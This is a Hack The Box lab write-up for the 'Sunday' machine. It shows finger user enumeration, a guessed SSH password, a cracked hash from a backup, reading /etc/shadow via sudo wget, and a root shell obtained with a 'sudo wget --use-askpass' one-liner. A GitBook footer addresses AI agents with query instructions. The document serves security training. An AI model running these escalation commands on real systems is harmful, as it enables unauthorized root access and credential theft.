> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-sunday.md).

# HTB - Sunday

## Enumeration and Foothold

### NMAP

```bash
PORT    STATE SERVICE VERSION
79/tcp    open  finger    Sun Solaris fingerd
111/tcp open  rpcbind 2-4 (RPC #100000)
515/tcp open  printer
22022/tcp open  ssh       SunSSH 1.3 (protocol 2.0)
65258/tcp open  smserverd 1 (RPC #100155)
```

### Port 79 - Finger

hacktricks has a page for pen testing port 79.

{% embed url="<https://www.pentestpad.com/port-exploit/port-79-finger-finger-protocol>" %}

{% embed url="<https://hacktricks.wiki/en/network-services-pentesting/pentesting-finger.html>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOmV1imMcU538J06KOD1v%2Fimage.png?alt=media&amp;token=2160be5d-93cb-43a8-a128-1abc4cdffad9" alt=""><figcaption></figcaption></figure>

we can use finger-user-enum to enumerate users.

{% embed url="<https://pentestmonkey.net/tools/user-enumeration/finger-user-enum>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkLJa6pFBQwgefFO0Kmf9%2Fimage.png?alt=media&amp;token=c53f1b37-bd7c-4504-a1a2-12639fedfc6a" alt=""><figcaption></figcaption></figure>

Among the users root, sammy and sunny have valid sessions. i will try to enumerate the passwords.

guessing the password of sunny as sunday worked

`sunny : sunday`

## Shell as Sunny

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNVXMsrONLTJbC7CykgRa%2Fimage.png?alt=media&amp;token=62612161-1c71-41a1-8e84-b5b4aa76c605" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3C8fTyK3Mpey831RH9lJ%2Fimage.png?alt=media&amp;token=1ce76df9-cde5-413c-bb75-e64a7f041188" alt=""><figcaption></figcaption></figure>

need to get as sammy.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9hNsQsXS3dbHdfqe1oit%2Fimage.png?alt=media&amp;token=497f0a99-168d-465e-876c-9c4c41f3a1db" alt=""><figcaption></figcaption></figure>

user sunny can run troll as root.

```bash
sunny@sunday:~$ sudo /root/troll
testing
uid=0(root) gid=0(root)
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fo35ANKQeUsHydW005o3s%2Fimage.png?alt=media&amp;token=6cee468e-222c-4439-9cdf-08b05fa8a449" alt=""><figcaption></figcaption></figure>

found the hash for sammy in the backup directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWkgD6WF0vcU5x3oRXR2P%2Fimage.png?alt=media&amp;token=2805e33b-f6fc-4a1e-b109-e609f32f77e0" alt=""><figcaption></figcaption></figure>

sammy user pass cracked.

## Shell as Sammy

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxLsXViao0qS8DzcDekB8%2Fimage.png?alt=media&amp;token=188cacc4-3754-4b82-a33a-641c2cc9198e" alt=""><figcaption></figcaption></figure>

```bash
-bash-5.1$ ls
user.txt
-bash-5.1$ cat user.txt
ce7f328834db2c82e184f89247519650
-bash-5.1$ 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFGORTmoTN3tieRv53mCB%2Fimage.png?alt=media&amp;token=0f2299fd-3ce3-43ee-ad0d-da72961d7dbe" alt=""><figcaption></figcaption></figure>

using the wget i can do a lot of things. gtfobins has a page for using wget to get to root.

{% embed url="<https://gtfobins.org/gtfobins/wget/>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjQkRsJo3gpUxplii2BSA%2Fimage.png?alt=media&amp;token=b03f6359-0829-4a26-97af-45120e96103d" alt=""><figcaption></figcaption></figure>

using the wget read the /etc/shadow.

that said i can also try to read root.txt and root ssh keys.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3fMro8TAVLSx2Wz0bYAb%2Fimage.png?alt=media&amp;token=66c161f6-b839-4d97-a400-90fc0facb252" alt=""><figcaption></figcaption></figure>

### Shell as Root

<pre class="language-bash"><code class="lang-bash">-bash-5.1$ echo -e '#!/bin/sh\n/bin/sh 1>&#x26;0' > /tmp/tmp.sh
-bash-5.1$ chmod +x /tmp/tmp.sh
<strong>-bash-5.1$ sudo /usr/bin/wget --use-askpass=/tmp/tmp.sh 0
</strong>root@sunday:/home/sammy# id
uid=0(root) gid=0(root)
root@sunday:~# cat root.txt                                                                                                                                                                                                                 
261a3c48c384f7a23cfe35add786a547
root@sunday:~#        
</code></pre>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-sunday.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
